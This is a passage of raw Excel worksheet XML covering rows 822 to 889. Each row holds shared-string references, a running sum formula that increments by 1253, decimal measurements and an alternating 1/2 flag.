        <f t="shared" si="12"/>
        <v>10458901</v>
      </c>
      <c r="D822" t="s">
        <v>1590</v>
      </c>
      <c r="E822">
        <v>4.1402945518493652</v>
      </c>
      <c r="F822">
        <v>2</v>
      </c>
    </row>
    <row r="823" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A823" t="s">
        <v>1591</v>
      </c>
      <c r="B823" t="s">
        <v>1592</v>
      </c>
      <c r="C823">
        <f t="shared" si="12"/>
        <v>10460154</v>
      </c>
      <c r="D823" t="s">
        <v>1593</v>
      </c>
      <c r="E823">
        <v>22.11049652099609</v>
      </c>
      <c r="F823">
        <v>1</v>
      </c>
    </row>
    <row r="824" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A824" t="s">
        <v>1591</v>
      </c>
      <c r="B824" t="s">
        <v>1592</v>
      </c>
      <c r="C824">
        <f t="shared" si="12"/>
        <v>10461407</v>
      </c>
      <c r="D824" t="s">
        <v>1594</v>
      </c>
      <c r="E824">
        <v>10.931680679321291</v>
      </c>
      <c r="F824">
        <v>2</v>
      </c>
    </row>
    <row r="825" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A825" t="s">
        <v>1595</v>
      </c>
      <c r="B825" t="s">
        <v>1596</v>
      </c>
      <c r="C825">
        <f t="shared" si="12"/>
        <v>10462660</v>
      </c>
      <c r="D825" t="s">
        <v>1597</v>
      </c>
      <c r="E825">
        <v>28.318231582641602</v>
      </c>
      <c r="F825">
        <v>1</v>
      </c>
    </row>
    <row r="826" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A826" t="s">
        <v>1595</v>
      </c>
      <c r="B826" t="s">
        <v>1596</v>
      </c>
      <c r="C826">
        <f t="shared" si="12"/>
        <v>10463913</v>
      </c>
      <c r="D826" t="s">
        <v>1598</v>
      </c>
      <c r="E826">
        <v>3.349236011505127</v>
      </c>
      <c r="F826">
        <v>2</v>
      </c>
    </row>
    <row r="827" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A827" t="s">
        <v>1599</v>
      </c>
      <c r="B827" t="s">
        <v>1600</v>
      </c>
      <c r="C827">
        <f t="shared" si="12"/>
        <v>10465166</v>
      </c>
      <c r="D827" t="s">
        <v>1601</v>
      </c>
      <c r="E827">
        <v>21.276334762573239</v>
      </c>
      <c r="F827">
        <v>1</v>
      </c>
    </row>
    <row r="828" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A828" t="s">
        <v>1599</v>
      </c>
      <c r="B828" t="s">
        <v>1600</v>
      </c>
      <c r="C828">
        <f t="shared" si="12"/>
        <v>10466419</v>
      </c>
      <c r="D828" t="s">
        <v>1602</v>
      </c>
      <c r="E828">
        <v>7.0932636260986328</v>
      </c>
      <c r="F828">
        <v>2</v>
      </c>
    </row>
    <row r="829" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A829" t="s">
        <v>1603</v>
      </c>
      <c r="B829" t="s">
        <v>1604</v>
      </c>
      <c r="C829">
        <f t="shared" si="12"/>
        <v>10467672</v>
      </c>
      <c r="D829" t="s">
        <v>1605</v>
      </c>
      <c r="E829">
        <v>22.240114212036129</v>
      </c>
      <c r="F829">
        <v>1</v>
      </c>
    </row>
    <row r="830" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A830" t="s">
        <v>1603</v>
      </c>
      <c r="B830" t="s">
        <v>1604</v>
      </c>
      <c r="C830">
        <f t="shared" si="12"/>
        <v>10468925</v>
      </c>
      <c r="D830" t="s">
        <v>1606</v>
      </c>
      <c r="E830">
        <v>11.24924278259277</v>
      </c>
      <c r="F830">
        <v>2</v>
      </c>
    </row>
    <row r="831" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A831" t="s">
        <v>1607</v>
      </c>
      <c r="B831" t="s">
        <v>1608</v>
      </c>
      <c r="C831">
        <f t="shared" si="12"/>
        <v>10470178</v>
      </c>
      <c r="D831" t="s">
        <v>1609</v>
      </c>
      <c r="E831">
        <v>21.433538436889648</v>
      </c>
      <c r="F831">
        <v>1</v>
      </c>
    </row>
    <row r="832" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A832" t="s">
        <v>1607</v>
      </c>
      <c r="B832" t="s">
        <v>1608</v>
      </c>
      <c r="C832">
        <f t="shared" si="12"/>
        <v>10471431</v>
      </c>
      <c r="D832" t="s">
        <v>1610</v>
      </c>
      <c r="E832">
        <v>8.5218734741210938</v>
      </c>
      <c r="F832">
        <v>2</v>
      </c>
    </row>
    <row r="833" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A833" t="s">
        <v>1611</v>
      </c>
      <c r="B833" t="s">
        <v>1612</v>
      </c>
      <c r="C833">
        <f t="shared" si="12"/>
        <v>10472684</v>
      </c>
      <c r="D833" t="s">
        <v>1613</v>
      </c>
      <c r="E833">
        <v>23.018875122070309</v>
      </c>
      <c r="F833">
        <v>1</v>
      </c>
    </row>
    <row r="834" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A834" t="s">
        <v>1611</v>
      </c>
      <c r="B834" t="s">
        <v>1612</v>
      </c>
      <c r="C834">
        <f t="shared" si="12"/>
        <v>10473937</v>
      </c>
      <c r="D834" t="s">
        <v>1614</v>
      </c>
      <c r="E834">
        <v>13.06378841400146</v>
      </c>
      <c r="F834">
        <v>2</v>
      </c>
    </row>
    <row r="835" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A835" t="s">
        <v>1615</v>
      </c>
      <c r="B835" t="s">
        <v>1616</v>
      </c>
      <c r="C835">
        <f t="shared" si="12"/>
        <v>10475190</v>
      </c>
      <c r="D835" t="s">
        <v>1553</v>
      </c>
      <c r="E835">
        <v>36.317375183105469</v>
      </c>
      <c r="F835">
        <v>1</v>
      </c>
    </row>
    <row r="836" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A836" t="s">
        <v>1615</v>
      </c>
      <c r="B836" t="s">
        <v>1616</v>
      </c>
      <c r="C836">
        <f t="shared" si="12"/>
        <v>10476443</v>
      </c>
      <c r="D836" t="s">
        <v>1617</v>
      </c>
      <c r="E836">
        <v>12.50313186645508</v>
      </c>
      <c r="F836">
        <v>2</v>
      </c>
    </row>
    <row r="837" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A837" t="s">
        <v>1618</v>
      </c>
      <c r="B837" t="s">
        <v>1619</v>
      </c>
      <c r="C837">
        <f t="shared" si="12"/>
        <v>10477696</v>
      </c>
      <c r="D837" t="s">
        <v>1620</v>
      </c>
      <c r="E837">
        <v>30.68845367431641</v>
      </c>
      <c r="F837">
        <v>1</v>
      </c>
    </row>
    <row r="838" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A838" t="s">
        <v>1618</v>
      </c>
      <c r="B838" t="s">
        <v>1619</v>
      </c>
      <c r="C838">
        <f t="shared" si="12"/>
        <v>10478949</v>
      </c>
      <c r="D838" t="s">
        <v>1621</v>
      </c>
      <c r="E838">
        <v>10.84677791595459</v>
      </c>
      <c r="F838">
        <v>2</v>
      </c>
    </row>
    <row r="839" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A839" t="s">
        <v>1622</v>
      </c>
      <c r="B839" t="s">
        <v>1623</v>
      </c>
      <c r="C839">
        <f t="shared" si="12"/>
        <v>10480202</v>
      </c>
      <c r="D839" t="s">
        <v>1624</v>
      </c>
      <c r="E839">
        <v>29.885599136352539</v>
      </c>
      <c r="F839">
        <v>1</v>
      </c>
    </row>
    <row r="840" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A840" t="s">
        <v>1622</v>
      </c>
      <c r="B840" t="s">
        <v>1623</v>
      </c>
      <c r="C840">
        <f t="shared" si="12"/>
        <v>10481455</v>
      </c>
      <c r="D840" t="s">
        <v>1625</v>
      </c>
      <c r="E840">
        <v>0.50360107421875</v>
      </c>
      <c r="F840">
        <v>2</v>
      </c>
    </row>
    <row r="841" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A841" t="s">
        <v>1626</v>
      </c>
      <c r="B841" t="s">
        <v>1627</v>
      </c>
      <c r="C841">
        <f t="shared" si="12"/>
        <v>10482708</v>
      </c>
      <c r="D841" t="s">
        <v>994</v>
      </c>
      <c r="E841">
        <v>37.014827728271477</v>
      </c>
      <c r="F841">
        <v>1</v>
      </c>
    </row>
    <row r="842" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A842" t="s">
        <v>1626</v>
      </c>
      <c r="B842" t="s">
        <v>1627</v>
      </c>
      <c r="C842">
        <f t="shared" ref="C842:C905" si="13">C841+1253</f>
        <v>10483961</v>
      </c>
      <c r="D842" t="s">
        <v>1628</v>
      </c>
      <c r="E842">
        <v>4.7546162605285636</v>
      </c>
      <c r="F842">
        <v>2</v>
      </c>
    </row>
    <row r="843" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A843" t="s">
        <v>1629</v>
      </c>
      <c r="B843" t="s">
        <v>1630</v>
      </c>
      <c r="C843">
        <f t="shared" si="13"/>
        <v>10485214</v>
      </c>
      <c r="D843" t="s">
        <v>1553</v>
      </c>
      <c r="E843">
        <v>36.501724243164063</v>
      </c>
      <c r="F843">
        <v>1</v>
      </c>
    </row>
    <row r="844" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A844" t="s">
        <v>1629</v>
      </c>
      <c r="B844" t="s">
        <v>1630</v>
      </c>
      <c r="C844">
        <f t="shared" si="13"/>
        <v>10486467</v>
      </c>
      <c r="D844" t="s">
        <v>1631</v>
      </c>
      <c r="E844">
        <v>5.702082633972168</v>
      </c>
      <c r="F844">
        <v>2</v>
      </c>
    </row>
    <row r="845" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A845" t="s">
        <v>1632</v>
      </c>
      <c r="B845" t="s">
        <v>1633</v>
      </c>
      <c r="C845">
        <f t="shared" si="13"/>
        <v>10487720</v>
      </c>
      <c r="D845" t="s">
        <v>1634</v>
      </c>
      <c r="E845">
        <v>23.646360397338871</v>
      </c>
      <c r="F845">
        <v>1</v>
      </c>
    </row>
    <row r="846" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A846" t="s">
        <v>1632</v>
      </c>
      <c r="B846" t="s">
        <v>1633</v>
      </c>
      <c r="C846">
        <f t="shared" si="13"/>
        <v>10488973</v>
      </c>
      <c r="D846" t="s">
        <v>1635</v>
      </c>
      <c r="E846">
        <v>1.5070648193359379</v>
      </c>
      <c r="F846">
        <v>2</v>
      </c>
    </row>
    <row r="847" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A847" t="s">
        <v>1636</v>
      </c>
      <c r="B847" t="s">
        <v>1637</v>
      </c>
      <c r="C847">
        <f t="shared" si="13"/>
        <v>10490226</v>
      </c>
      <c r="D847" t="s">
        <v>1638</v>
      </c>
      <c r="E847">
        <v>31.322843551635739</v>
      </c>
      <c r="F847">
        <v>1</v>
      </c>
    </row>
    <row r="848" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A848" t="s">
        <v>1636</v>
      </c>
      <c r="B848" t="s">
        <v>1637</v>
      </c>
      <c r="C848">
        <f t="shared" si="13"/>
        <v>10491479</v>
      </c>
      <c r="D848" t="s">
        <v>1639</v>
      </c>
      <c r="E848">
        <v>2.331294305622578E-2</v>
      </c>
      <c r="F848">
        <v>2</v>
      </c>
    </row>
    <row r="849" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A849" t="s">
        <v>1640</v>
      </c>
      <c r="B849" t="s">
        <v>1641</v>
      </c>
      <c r="C849">
        <f t="shared" si="13"/>
        <v>10492732</v>
      </c>
      <c r="D849" t="s">
        <v>1642</v>
      </c>
      <c r="E849">
        <v>12.648820877075201</v>
      </c>
      <c r="F849">
        <v>1</v>
      </c>
    </row>
    <row r="850" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A850" t="s">
        <v>1640</v>
      </c>
      <c r="B850" t="s">
        <v>1641</v>
      </c>
      <c r="C850">
        <f t="shared" si="13"/>
        <v>10493985</v>
      </c>
      <c r="D850" t="s">
        <v>1643</v>
      </c>
      <c r="E850">
        <v>0.67518758773803711</v>
      </c>
      <c r="F850">
        <v>2</v>
      </c>
    </row>
    <row r="851" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A851" t="s">
        <v>1644</v>
      </c>
      <c r="B851" t="s">
        <v>1645</v>
      </c>
      <c r="C851">
        <f t="shared" si="13"/>
        <v>10495238</v>
      </c>
      <c r="D851" t="s">
        <v>1646</v>
      </c>
      <c r="E851">
        <v>30.120990753173832</v>
      </c>
      <c r="F851">
        <v>1</v>
      </c>
    </row>
    <row r="852" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A852" t="s">
        <v>1644</v>
      </c>
      <c r="B852" t="s">
        <v>1645</v>
      </c>
      <c r="C852">
        <f t="shared" si="13"/>
        <v>10496491</v>
      </c>
      <c r="D852" t="s">
        <v>1647</v>
      </c>
      <c r="E852">
        <v>4.3692898750305176</v>
      </c>
      <c r="F852">
        <v>2</v>
      </c>
    </row>
    <row r="853" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A853" t="s">
        <v>1648</v>
      </c>
      <c r="B853" t="s">
        <v>1649</v>
      </c>
      <c r="C853">
        <f t="shared" si="13"/>
        <v>10497744</v>
      </c>
      <c r="D853" t="s">
        <v>1650</v>
      </c>
      <c r="E853">
        <v>24.839532852172852</v>
      </c>
      <c r="F853">
        <v>1</v>
      </c>
    </row>
    <row r="854" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A854" t="s">
        <v>1648</v>
      </c>
      <c r="B854" t="s">
        <v>1649</v>
      </c>
      <c r="C854">
        <f t="shared" si="13"/>
        <v>10498997</v>
      </c>
      <c r="D854" t="s">
        <v>1651</v>
      </c>
      <c r="E854">
        <v>11.52639675140381</v>
      </c>
      <c r="F854">
        <v>2</v>
      </c>
    </row>
    <row r="855" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A855" t="s">
        <v>1652</v>
      </c>
      <c r="B855" t="s">
        <v>1653</v>
      </c>
      <c r="C855">
        <f t="shared" si="13"/>
        <v>10500250</v>
      </c>
      <c r="D855" t="s">
        <v>1654</v>
      </c>
      <c r="E855">
        <v>19.900083541870121</v>
      </c>
      <c r="F855">
        <v>1</v>
      </c>
    </row>
    <row r="856" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A856" t="s">
        <v>1652</v>
      </c>
      <c r="B856" t="s">
        <v>1653</v>
      </c>
      <c r="C856">
        <f t="shared" si="13"/>
        <v>10501503</v>
      </c>
      <c r="D856" t="s">
        <v>1655</v>
      </c>
      <c r="E856">
        <v>4.4677095413208008</v>
      </c>
      <c r="F856">
        <v>2</v>
      </c>
    </row>
    <row r="857" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A857" t="s">
        <v>1656</v>
      </c>
      <c r="B857" t="s">
        <v>1657</v>
      </c>
      <c r="C857">
        <f t="shared" si="13"/>
        <v>10502756</v>
      </c>
      <c r="D857" t="s">
        <v>1658</v>
      </c>
      <c r="E857">
        <v>25.309499740600589</v>
      </c>
      <c r="F857">
        <v>1</v>
      </c>
    </row>
    <row r="858" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A858" t="s">
        <v>1656</v>
      </c>
      <c r="B858" t="s">
        <v>1657</v>
      </c>
      <c r="C858">
        <f t="shared" si="13"/>
        <v>10504009</v>
      </c>
      <c r="D858" t="s">
        <v>1659</v>
      </c>
      <c r="E858">
        <v>9.5596733093261719</v>
      </c>
      <c r="F858">
        <v>2</v>
      </c>
    </row>
    <row r="859" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A859" t="s">
        <v>1660</v>
      </c>
      <c r="B859" t="s">
        <v>1661</v>
      </c>
      <c r="C859">
        <f t="shared" si="13"/>
        <v>10505262</v>
      </c>
      <c r="D859" t="s">
        <v>1662</v>
      </c>
      <c r="E859">
        <v>28.512737274169918</v>
      </c>
      <c r="F859">
        <v>1</v>
      </c>
    </row>
    <row r="860" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A860" t="s">
        <v>1660</v>
      </c>
      <c r="B860" t="s">
        <v>1661</v>
      </c>
      <c r="C860">
        <f t="shared" si="13"/>
        <v>10506515</v>
      </c>
      <c r="D860" t="s">
        <v>1663</v>
      </c>
      <c r="E860">
        <v>0.89516085386276245</v>
      </c>
      <c r="F860">
        <v>2</v>
      </c>
    </row>
    <row r="861" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A861" t="s">
        <v>1664</v>
      </c>
      <c r="B861" t="s">
        <v>1665</v>
      </c>
      <c r="C861">
        <f t="shared" si="13"/>
        <v>10507768</v>
      </c>
      <c r="D861" t="s">
        <v>1666</v>
      </c>
      <c r="E861">
        <v>22.190328598022461</v>
      </c>
      <c r="F861">
        <v>1</v>
      </c>
    </row>
    <row r="862" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A862" t="s">
        <v>1664</v>
      </c>
      <c r="B862" t="s">
        <v>1665</v>
      </c>
      <c r="C862">
        <f t="shared" si="13"/>
        <v>10509021</v>
      </c>
      <c r="D862" t="s">
        <v>1667</v>
      </c>
      <c r="E862">
        <v>11.98788452148438</v>
      </c>
      <c r="F862">
        <v>2</v>
      </c>
    </row>
    <row r="863" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A863" t="s">
        <v>1668</v>
      </c>
      <c r="B863" t="s">
        <v>1669</v>
      </c>
      <c r="C863">
        <f t="shared" si="13"/>
        <v>10510274</v>
      </c>
      <c r="D863" t="s">
        <v>708</v>
      </c>
      <c r="E863">
        <v>23.17916297912598</v>
      </c>
      <c r="F863">
        <v>1</v>
      </c>
    </row>
    <row r="864" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A864" t="s">
        <v>1668</v>
      </c>
      <c r="B864" t="s">
        <v>1669</v>
      </c>
      <c r="C864">
        <f t="shared" si="13"/>
        <v>10511527</v>
      </c>
      <c r="D864" t="s">
        <v>1670</v>
      </c>
      <c r="E864">
        <v>10.83447265625</v>
      </c>
      <c r="F864">
        <v>2</v>
      </c>
    </row>
    <row r="865" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A865" t="s">
        <v>1671</v>
      </c>
      <c r="B865" t="s">
        <v>1672</v>
      </c>
      <c r="C865">
        <f t="shared" si="13"/>
        <v>10512780</v>
      </c>
      <c r="D865" t="s">
        <v>1673</v>
      </c>
      <c r="E865">
        <v>24.013643264770511</v>
      </c>
      <c r="F865">
        <v>1</v>
      </c>
    </row>
    <row r="866" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A866" t="s">
        <v>1671</v>
      </c>
      <c r="B866" t="s">
        <v>1672</v>
      </c>
      <c r="C866">
        <f t="shared" si="13"/>
        <v>10514033</v>
      </c>
      <c r="D866" t="s">
        <v>1674</v>
      </c>
      <c r="E866">
        <v>0.26298472285270691</v>
      </c>
      <c r="F866">
        <v>2</v>
      </c>
    </row>
    <row r="867" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A867" t="s">
        <v>1675</v>
      </c>
      <c r="B867" t="s">
        <v>1676</v>
      </c>
      <c r="C867">
        <f t="shared" si="13"/>
        <v>10515286</v>
      </c>
      <c r="D867" t="s">
        <v>1677</v>
      </c>
      <c r="E867">
        <v>28.631326675415039</v>
      </c>
      <c r="F867">
        <v>1</v>
      </c>
    </row>
    <row r="868" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A868" t="s">
        <v>1675</v>
      </c>
      <c r="B868" t="s">
        <v>1676</v>
      </c>
      <c r="C868">
        <f t="shared" si="13"/>
        <v>10516539</v>
      </c>
      <c r="D868" t="s">
        <v>1678</v>
      </c>
      <c r="E868">
        <v>14.63444709777832</v>
      </c>
      <c r="F868">
        <v>2</v>
      </c>
    </row>
    <row r="869" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A869" t="s">
        <v>1679</v>
      </c>
      <c r="B869" t="s">
        <v>1680</v>
      </c>
      <c r="C869">
        <f t="shared" si="13"/>
        <v>10517792</v>
      </c>
      <c r="D869" t="s">
        <v>1681</v>
      </c>
      <c r="E869">
        <v>38.825260162353523</v>
      </c>
      <c r="F869">
        <v>1</v>
      </c>
    </row>
    <row r="870" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A870" t="s">
        <v>1679</v>
      </c>
      <c r="B870" t="s">
        <v>1680</v>
      </c>
      <c r="C870">
        <f t="shared" si="13"/>
        <v>10519045</v>
      </c>
      <c r="D870" t="s">
        <v>1682</v>
      </c>
      <c r="E870">
        <v>11.173483848571779</v>
      </c>
      <c r="F870">
        <v>2</v>
      </c>
    </row>
    <row r="871" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A871" t="s">
        <v>1683</v>
      </c>
      <c r="B871" t="s">
        <v>1684</v>
      </c>
      <c r="C871">
        <f t="shared" si="13"/>
        <v>10520298</v>
      </c>
      <c r="D871" t="s">
        <v>1685</v>
      </c>
      <c r="E871">
        <v>32.957366943359382</v>
      </c>
      <c r="F871">
        <v>1</v>
      </c>
    </row>
    <row r="872" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A872" t="s">
        <v>1683</v>
      </c>
      <c r="B872" t="s">
        <v>1684</v>
      </c>
      <c r="C872">
        <f t="shared" si="13"/>
        <v>10521551</v>
      </c>
      <c r="D872" t="s">
        <v>1686</v>
      </c>
      <c r="E872">
        <v>12.622494697570801</v>
      </c>
      <c r="F872">
        <v>2</v>
      </c>
    </row>
    <row r="873" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A873" t="s">
        <v>1687</v>
      </c>
      <c r="B873" t="s">
        <v>1688</v>
      </c>
      <c r="C873">
        <f t="shared" si="13"/>
        <v>10522804</v>
      </c>
      <c r="D873" t="s">
        <v>1689</v>
      </c>
      <c r="E873">
        <v>21.53415679931641</v>
      </c>
      <c r="F873">
        <v>1</v>
      </c>
    </row>
    <row r="874" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A874" t="s">
        <v>1687</v>
      </c>
      <c r="B874" t="s">
        <v>1688</v>
      </c>
      <c r="C874">
        <f t="shared" si="13"/>
        <v>10524057</v>
      </c>
      <c r="D874" t="s">
        <v>1690</v>
      </c>
      <c r="E874">
        <v>1.8744161128997801</v>
      </c>
      <c r="F874">
        <v>2</v>
      </c>
    </row>
    <row r="875" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A875" t="s">
        <v>1691</v>
      </c>
      <c r="B875" t="s">
        <v>1692</v>
      </c>
      <c r="C875">
        <f t="shared" si="13"/>
        <v>10525310</v>
      </c>
      <c r="D875" t="s">
        <v>1693</v>
      </c>
      <c r="E875">
        <v>25.437726974487301</v>
      </c>
      <c r="F875">
        <v>1</v>
      </c>
    </row>
    <row r="876" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A876" t="s">
        <v>1691</v>
      </c>
      <c r="B876" t="s">
        <v>1692</v>
      </c>
      <c r="C876">
        <f t="shared" si="13"/>
        <v>10526563</v>
      </c>
      <c r="D876" t="s">
        <v>1694</v>
      </c>
      <c r="E876">
        <v>12.40510368347168</v>
      </c>
      <c r="F876">
        <v>2</v>
      </c>
    </row>
    <row r="877" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A877" t="s">
        <v>1695</v>
      </c>
      <c r="B877" t="s">
        <v>1696</v>
      </c>
      <c r="C877">
        <f t="shared" si="13"/>
        <v>10527816</v>
      </c>
      <c r="D877" t="s">
        <v>1697</v>
      </c>
      <c r="E877">
        <v>15.485324859619141</v>
      </c>
      <c r="F877">
        <v>1</v>
      </c>
    </row>
    <row r="878" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A878" t="s">
        <v>1695</v>
      </c>
      <c r="B878" t="s">
        <v>1696</v>
      </c>
      <c r="C878">
        <f t="shared" si="13"/>
        <v>10529069</v>
      </c>
      <c r="D878" t="s">
        <v>1698</v>
      </c>
      <c r="E878">
        <v>14.251729965209959</v>
      </c>
      <c r="F878">
        <v>2</v>
      </c>
    </row>
    <row r="879" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A879" t="s">
        <v>1699</v>
      </c>
      <c r="B879" t="s">
        <v>1700</v>
      </c>
      <c r="C879">
        <f t="shared" si="13"/>
        <v>10530322</v>
      </c>
      <c r="D879" t="s">
        <v>1701</v>
      </c>
      <c r="E879">
        <v>34.449562072753913</v>
      </c>
      <c r="F879">
        <v>1</v>
      </c>
    </row>
    <row r="880" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A880" t="s">
        <v>1699</v>
      </c>
      <c r="B880" t="s">
        <v>1700</v>
      </c>
      <c r="C880">
        <f t="shared" si="13"/>
        <v>10531575</v>
      </c>
      <c r="D880" t="s">
        <v>1702</v>
      </c>
      <c r="E880">
        <v>2.3465735912322998</v>
      </c>
      <c r="F880">
        <v>2</v>
      </c>
    </row>
    <row r="881" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A881" t="s">
        <v>1703</v>
      </c>
      <c r="B881" t="s">
        <v>1704</v>
      </c>
      <c r="C881">
        <f t="shared" si="13"/>
        <v>10532828</v>
      </c>
      <c r="D881" t="s">
        <v>1705</v>
      </c>
      <c r="E881">
        <v>21.852399826049801</v>
      </c>
      <c r="F881">
        <v>1</v>
      </c>
    </row>
    <row r="882" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A882" t="s">
        <v>1703</v>
      </c>
      <c r="B882" t="s">
        <v>1704</v>
      </c>
      <c r="C882">
        <f t="shared" si="13"/>
        <v>10534081</v>
      </c>
      <c r="D882" t="s">
        <v>1706</v>
      </c>
      <c r="E882">
        <v>0.12947465479373929</v>
      </c>
      <c r="F882">
        <v>2</v>
      </c>
    </row>
    <row r="883" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A883" t="s">
        <v>1707</v>
      </c>
      <c r="B883" t="s">
        <v>1708</v>
      </c>
      <c r="C883">
        <f t="shared" si="13"/>
        <v>10535334</v>
      </c>
      <c r="D883" t="s">
        <v>1709</v>
      </c>
      <c r="E883">
        <v>36.687721252441413</v>
      </c>
      <c r="F883">
        <v>1</v>
      </c>
    </row>
    <row r="884" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A884" t="s">
        <v>1707</v>
      </c>
      <c r="B884" t="s">
        <v>1708</v>
      </c>
      <c r="C884">
        <f t="shared" si="13"/>
        <v>10536587</v>
      </c>
      <c r="D884" t="s">
        <v>1710</v>
      </c>
      <c r="E884">
        <v>7.2546873092651367</v>
      </c>
      <c r="F884">
        <v>2</v>
      </c>
    </row>
    <row r="885" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A885" t="s">
        <v>1711</v>
      </c>
      <c r="B885" t="s">
        <v>1712</v>
      </c>
      <c r="C885">
        <f t="shared" si="13"/>
        <v>10537840</v>
      </c>
      <c r="D885" t="s">
        <v>1713</v>
      </c>
      <c r="E885">
        <v>28.39040374755859</v>
      </c>
      <c r="F885">
        <v>1</v>
      </c>
    </row>
    <row r="886" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A886" t="s">
        <v>1711</v>
      </c>
      <c r="B886" t="s">
        <v>1712</v>
      </c>
      <c r="C886">
        <f t="shared" si="13"/>
        <v>10539093</v>
      </c>
      <c r="D886" t="s">
        <v>1714</v>
      </c>
      <c r="E886">
        <v>1.0448213815689089</v>
      </c>
      <c r="F886">
        <v>2</v>
      </c>
    </row>
    <row r="887" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A887" t="s">
        <v>1715</v>
      </c>
      <c r="B887" t="s">
        <v>1716</v>
      </c>
      <c r="C887">
        <f t="shared" si="13"/>
        <v>10540346</v>
      </c>
      <c r="D887" t="s">
        <v>1717</v>
      </c>
      <c r="E887">
        <v>25.379182815551761</v>
      </c>
      <c r="F887">
        <v>1</v>
      </c>
    </row>
    <row r="888" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A888" t="s">
        <v>1715</v>
      </c>
      <c r="B888" t="s">
        <v>1716</v>
      </c>
      <c r="C888">
        <f t="shared" si="13"/>
        <v>10541599</v>
      </c>
      <c r="D888" t="s">
        <v>1718</v>
      </c>
      <c r="E888">
        <v>13.40546989440918</v>
      </c>
      <c r="F888">
        <v>2</v>
      </c>
    </row>
    <row r="889" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A889" t="s">
        <v>1719</v>
      </c>
      <c r="B889" t="s">
        <v>1720</v>
      </c>
      <c r="C889">
        <f t="shared" si="13"/>
        <v>10542852</v>
